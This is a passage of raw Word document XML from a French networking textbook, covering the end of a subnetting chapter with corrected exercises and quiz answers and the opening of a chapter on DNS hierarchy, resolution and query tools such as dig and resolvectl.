        <w:t xml:space="preserve"> 20 hôtes → /27 (30 utiles)   192.168.10.192/27</w:t>
        <w:br/>
        <w:br/>
        <w:t># Reste : 192.168.10.224/27 pour la croissance</w:t>
        <w:br/>
        <w:br/>
        <w:t>ipcalc 192.168.10.128/26</w:t>
        <w:br/>
        <w:t>ipcalc 192.168.10.192/27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>On arrondit toujours au préfixe immédiatement supérieur au besoin : 100 hôtes exigent /25, pas /26 (62).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Documenter la plage restante évite de la réattribuer par erreur plus tard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 55.2</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Observer les conflits ARP</w:t>
        <w:br/>
        <w:t>ip -s neigh | grep -i fail</w:t>
        <w:br/>
        <w:t>arping -D -I eth0 192.168.1.50</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la configuration</w:t>
        <w:br/>
        <w:t>ip addr show</w:t>
        <w:br/>
        <w:br/>
        <w:t># Prévention : réservation DHCP par adresse MAC</w:t>
        <w:br/>
        <w:t># Dans le serveur DHCP : host poste-12 { hardware ethernet ...; fixed-address</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ...; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un conflit se manifeste par des coupures intermittentes, des entrées ARP instables et des erreurs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>duplicate address detected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans le journal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La réservation DHCP centralise l'attribution : deux administrateurs ne peuvent plus attribuer la même adresse à la main.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 55.3</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ip route get 203.0.113.10</w:t>
        <w:br/>
        <w:t>traceroute -n 203.0.113.10</w:t>
        <w:br/>
        <w:t># Sur le serveur distant</w:t>
        <w:br/>
        <w:t>ip route get &lt;adresse-du-client&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une route asymétrique peut casser TLS ou les pare-feux stateful : les paquets de retour ne suivent pas le chemin attendu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Comparer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ip route get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> des deux côtés identifie immédiatement la divergence de passerelle.</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Combien d'hôtes utiles dans un /26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64</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62</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30</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126</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Quelle est l'adresse de diffusion d'un /24 en 192.168.1.0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192.168.1.0</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192.168.1.1</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192.168.1.255</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192.168.1.254</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Quel bloc est réservé aux réseaux privés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8.8.8.0/24</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172.16.0.0/12</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1.1.1.0/24</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203.0.113.0/24</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Comment un hôte décide-t-il d'utiliser la passerelle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Au hasard</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En comparant la destination à son masque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Par le DNS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Par le pare-feu</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Quelle route gagne si deux correspondent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La plus ancienne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La plus spécifique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La plus rapide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La première</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2^6 - 2 = 62 hôtes utiles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> L'adresse de diffusion a tous les bits d'hôte à 1.</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Les trois blocs privés sont 10/8, 172.16/12 et 192.168/16.</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Si la destination n'est pas dans le réseau local, il envoie à la passerelle.</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Le préfixe le plus long l'emporte toujours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>56. DNS : nommer, résoudre, diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le système qui traduit les noms en adresses, et dont la panne ressemble souvent à une panne réseau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 55</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Décrire la résolution d'un nom, du cache au serveur autoritaire.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Choisir les types d'enregistrements adaptés.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Configurer une zone et des sous-domaines.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Diagnostiquer une résolution lente ou erronée.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Comprendre la propagation et les TTL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>56.1 Une hiérarchie de délégations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le DNS n'est pas un annuaire central : c'est une hiérarchie où chaque niveau délègue la responsabilité d'une partie des noms. La racine délègue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, qui délègue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exemple.fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2984500"/>
            <wp:docPr id="67" name="Picture 67"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f65.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2984500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.65 — La hiérarchie des noms</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois niveaux de délégation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Les treize serveurs racine (plus leurs instances anycast)</w:t>
        <w:br/>
        <w:t>dig . NS +short</w:t>
        <w:br/>
        <w:br/>
        <w:t># Les serveurs du TLD</w:t>
        <w:br/>
        <w:t>dig fr NS +short</w:t>
        <w:br/>
        <w:br/>
        <w:t># Les serveurs autoritaires d'une zone</w:t>
        <w:br/>
        <w:t>dig exemple.fr NS +short</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SERVEUR AUTORITAIRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Serveur qui détient réellement les données d'une zone. Les résolveurs interrogent les autoritaires puis mettent en cache les réponses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>56.2 Le trajet d'une résolution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un résolveur récursif interroge la hiérarchie à la place du client, puis met en cache la réponse pendant la durée du TTL. C'est ce cache qui rend le DNS supportable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="68" name="Picture 68"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f66.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.66 — Résolution de www.exemple.fr</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes de résolution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Interroger un résolveur précis</w:t>
        <w:br/>
        <w:t>dig @1.1.1.1 www.exemple.fr A</w:t>
        <w:br/>
        <w:t>dig @8.8.8.8 www.exemple.fr AAAA</w:t>
        <w:br/>
        <w:br/>
        <w:t># Voir la délégation complète</w:t>
        <w:br/>
        <w:t>dig +trace www.exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mesurer le temps de résolution</w:t>
        <w:br/>
        <w:t>dig www.exemple.fr | grep "Query time"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Connaître le résolveur utilisé</w:t>
        <w:br/>
        <w:t>resolvectl status</w:t>
        <w:br/>
        <w:t>cat /etc/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.194 — Cinq outils de requête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47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Outil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Avantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Requête détaillée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Référence, sortie complète</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Réponse courte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Rapide à lire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>nslookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interactif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Disponible partout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="247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drill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Équivalent </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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DNSSEC lisible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2472"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>resolvectl query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3344"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégré à systemd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Résout via les résolveurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>56.3 Les types d'enregistrements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un nom porte plusieurs types d'informations. Chacun a un usage précis, et certains sont indispensables à la messagerie ou à la sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.195 — Huit types d'enregistrements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174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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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407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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Adresse IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4071"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
